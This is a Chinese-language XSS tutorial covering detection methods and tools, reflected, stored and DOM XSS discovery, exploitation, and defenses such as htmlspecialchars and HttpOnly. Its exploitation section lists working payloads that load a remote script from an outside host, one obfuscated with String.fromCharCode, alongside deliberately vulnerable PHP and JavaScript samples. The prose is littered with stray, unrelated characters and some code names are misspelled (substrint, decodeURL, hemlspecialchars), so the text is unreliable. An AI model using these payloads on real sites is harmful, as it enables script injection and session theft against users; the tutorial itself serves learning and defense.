XSS的檢測

檢測XSS一般分兩種方法：一種是手工檢測性昭、一種是軟件自動檢測
手工檢測：檢測結(jié)果準(zhǔn)確，但對于大型web來說費時費力
軟件檢測：方便省力，但存在誤報，且有寫隱蔽的XSS無法檢測出
檢測XSS最重要的就是考慮哪里有輸入撬腾，輸入的數(shù)據(jù)在哪里輸出

1. 手工檢測

可得知輸出位置:
    ? 輸入敏感字符，如“<恢恼、>民傻、"、'、()”等漓踢，然后在提交后查看html源代碼创泄，看這些字符是否被轉(zhuǎn)義籍铁。
    ? 在輸出這些字符時，程序可能已經(jīng)進行了過濾撕予，可以輸入“AAAAAA<>"&'()”字符串酪碘，然后查找AAAAAA或許比較方便扣囊。
無法得知輸出位置:
    很多web應(yīng)用程序源碼不公開吉嫩，在測試時不能的值輸出位置其掂，比如，有些留言本在留言后必須經(jīng)過管理員審核才能顯示吴菠，無法的值數(shù)據(jù)在后臺管理頁面處于何種狀態(tài)者填，如：
    在標(biāo)簽中：<div>XSS Test</div>
    在屬性內(nèi)：<input type="text" name="content" value="XSS Test" />
    這種情況通常采用輸入"/>XSS Test來測試浩村。

2. 全自動檢測XSS

如APPSCAN做葵、AWVS、Burp Suite等軟件都可以有效的檢測XSS心墅，他們還會檢測其他的漏洞酿矢，但是他們的效率不如專業(yè)的XSS檢測工具高。
專業(yè)的XSS掃描工具有知名的XSSER怎燥、XSSF等瘫筐，還有專門掃描DOM類型XSS的web服務(wù)(www.domxssscanner.com)。
一般要手工和軟件一起使用铐姚，因為有些XSS軟件不能檢測策肝，不如有些留言需要輸入驗證碼等，工具無法做到隐绵。

XSS的挖掘與利用

1. XSS漏洞挖掘

反射型XSS：
    一般是url參數(shù)中的值能夠回顯到HTML中之众，且url的參數(shù)值沒有過濾或過濾不嚴(yán)
存儲型XSS：
    可以提交內(nèi)容
    提交的內(nèi)容可被管理員或其他用戶看到
    提交的內(nèi)容沒有被過濾或過濾不嚴(yán)

2. XSS漏洞利用

XSS一般就是閉合標(biāo)簽，和SQL注入類似依许，常見payload如下：

? <script src='http://b.ioio.pub/xss/probe.js'></script>
? <img src=x onerror="s=createElement('script');body.appendChild(s);s.src='http://b.ioio.pub/xss/probe.js'";>
? <svg onload=s=createElement('script');body.appendChild(s);s.src='http://b.ioio.pub/xss/probe.js>
? <svg onload=eval(String.fromCharCode(115,61,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,115,46,115,114,99,61,39,104,116,116,112,58,47,47,98,46,105,111,105,111,46,112,117,98,47,120,115,115,47,112,114,111,98,101,46,106,115)) >

XSS簡單示例

反射型xss簡單示例:
    ? <?php
          echo $_GET['x'];
      ?>
    ? 提交：
      /xss.php?x=<script>alert(1)</script>
    ? 服務(wù)端解析時就會觸發(fā)彈窗

下面是一段經(jīng)典的DOM型XSS示例：
<script>
    var temp = document.URL; //獲取URL
    var index = document.URL.indexOf("content");
    var par = temp.substrint(index);
    document.write(decodeURL(par)); //輸入獲取內(nèi)容
</script>
上述代碼的意思是獲取URL中content參數(shù)的值棺禾，并且輸出，若輸入http://www.xxx.com/dom.html?content=<script>alert(/xss/)</script>峭跳，就會產(chǎn)生XSS漏洞膘婶。

只要在script標(biāo)簽中添加JavaScript代碼，就能實現(xiàn)一些“特殊效果”蛀醉，但通常在真實攻擊中一般使用<script src="http://www.xxx.com/a.txt"></script>的方式來加載外部腳本悬襟，a.txt中就存放這惡意腳本。
注：JavaScript加載的腳本文件可以是任意擴展名拯刁，甚至沒有也行脊岳，只要加載的文件中含有JavaScript代碼就會被執(zhí)行。

XSS的防御

1. 過濾輸入與輸出(重點)

使用hemlspecialchars()和hemlentities()將一些預(yù)定義的字符轉(zhuǎn)換為HTML實體

<?php
    @$html = $_GET['x'];
    if ($html){
        echo htmlspecialchars($html);
    }
?>

2. HttpOnly

HttpOnly并不能防御XSS，它是為了解決XSS漏洞后面的Cookie劫持攻擊逸绎，它可以有效地阻擋XSS會話劫持攻擊惹恃。